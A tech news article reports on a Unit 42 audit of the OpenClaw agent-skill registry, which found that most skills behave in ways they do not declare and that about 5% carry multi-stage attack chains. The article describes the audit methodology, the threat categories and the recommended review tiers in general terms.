Palo Alto Networks Unit 42 Audits All 49,943 OpenClaw Skills, Finds 80% Have Undisclosed Behaviors

Palo Alto Networks’ Unit 42 security team crawled the entire OpenClaw agent-skill registry in early 2026 and ran a new automated audit methodology across all 49,943 listed skills. The results, published June 11, found that 80% of skills (39,933) exhibited at least one mismatch between their declared behavior and their actual behavior. A smaller but more dangerous slice, 5% of the registry (2,490 skills), carried multi-stage attack chains capable of credential theft, remote code execution, or silent data exfiltration.

What Unit 42 Built

The research introduces Behavioral Integrity Verification (BIV), an audit methodology that compares what a skill claims to do against what it actually does across three surfaces: metadata, executable code, and natural-language instructions. The methodology uses a fixed taxonomy of 29 capabilities organized into seven families covering network access, file system operations, process execution, environment variables, encoding, credentials, and instruction-level threats.

Two parallel analysis tracks populate the taxonomy. A declared track reads the metadata using deterministic parsers for structured fields and an LLM for natural-language descriptions. An actual track reads the code via static analyzers using AST-level taint analysis across Python, JavaScript, and shell, while a separate LLM reads natural-language instructions to surface prompt-injection patterns that traditional parsers miss, according to Unit 42.

A skill passes when its actual capability set fits inside its declared capability set. It fails when it does something it never disclosed.

The Numbers

Applied at registry scale, BIV surfaced 250,706 behavioral deviations across the 49,943 skills. A clustering pass over deviation explanations produced 137 distinct categories and four novel compound threat types that Unit 42 describes as multi-step patterns:

Exfiltration chains: file read, base64 encode, network send
Remote code execution chains: download, write, execute
Code obfuscation: encoding chain into dynamic eval
Data lineage violations: file read into file write (mostly benign pipeline boilerplate)

The threat, as Unit 42 frames it, lives in the chain rather than any individual link. A scanner checking one capability at a time sees a file read in one row and a network send in another and flags neither in isolation. BIV’s contribution is connecting them.

Sloppy Documentation, Not Mostly Malice

An intent classifier applied to 163,754 clustered deviations found that 81.1% traced to developer oversight: documentation errors, legitimate helper code, unused declarations, and framework dependencies. The remaining 18.9% traced to adversarial intent, with data theft and espionage accounting for 60% of the adversarial total, according to the research.

The registry breaks into three governance tiers. The top tier, 5.0% of the registry (2,490 skills), carries multi-stage attack chains and warrants mandatory security review. A middle tier of 16.8% carries single-stage adversarial deviations warranting contextual review. The remaining 72.5% show benign mismatches that call for documentation outreach, not security intervention.

The Supply Chain Comparison

Unit 42 frames the current state of the OpenClaw skill ecosystem as comparable to where mobile app stores and browser extension marketplaces were a decade ago: extensibility has outpaced the supply-chain audit primitives that should gate it. Anyone can publish a skill to the public registry. Anyone can install one into a production agent. No automated tool had previously verified what a skill does before it gains privileged access to credentials, files, and shell commands inside that agent.

The research recommends that security teams running LLM agents in production inventory third-party skills installed and require behavioral-integrity checks before installation rather than after. Palo Alto Networks points to its Prisma AIRS (AI Runtime Security) product as its own mitigation layer for this class of risk.

The research was authored by Yuhao Wu, Tony Li, and Hongliang Liu of the Unit 42 team.

Palo Alto Networks Unit 42 Audits All 49,943 OpenClaw Skills, Finds 80% Have Undisclosed Behaviors

What Unit 42 Built

The Numbers

Sloppy Documentation, Not Mostly Malice

The Supply Chain Comparison

Get our morning briefing in your inbox

Keep Reading

Barret Zoph Exits OpenAI for Second Time After Five Months as Enterprise Head

Yahoo DSP Launches Agent Network With 30+ Partners Across Ad-Tech Workflow

Omdia: Agentic AI Is Forcing AWS, Google, and Microsoft to Redesign Their Cloud Infrastructure